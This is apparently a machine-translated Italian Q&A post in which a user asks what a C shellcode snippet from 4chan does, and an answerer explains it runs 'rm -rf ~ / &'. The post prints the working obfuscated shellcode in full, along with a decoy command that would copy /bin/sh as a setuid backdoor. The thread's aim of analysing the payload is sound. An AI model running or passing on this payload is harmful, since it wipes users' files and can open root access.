Che cosa fa questo codice potenzialmente dannoso? [chiuso]

2

Durante la lettura di un sito web chiamato 4chan / b / qualcuno ha postato questo snippet di codice, mi chiedevo cosa fare quando viene eseguito? sembra essere il codice C, quanto è dannoso?

Questo è il post completo:

Run a live system and try this:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
                                               release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Sarebbe sicuro testarlo in una sandbox?

    
posta kyle k 13.12.2014 - 02:33
fonte

1 risposta

6

L'incomprensibile esagono che vedi è codice macchina .

Su Google per quella particolare stringa esadecimale viene visualizzata questa pagina wiki .

Secondo il wiki, questo in realtà funziona:

rm -rf ~ / &

Sì, è piuttosto dannoso ma dovrebbe essere sicuro eseguire in una macchina virtuale, se si dispone di un backup (o istantanea), sotto un utente non privilegiato, altrimenti eseguirlo come utente privilegiato cancellerà i file

    
risposta data 13.12.2014 - 02:39
fonte

Leggi altre domande sui tag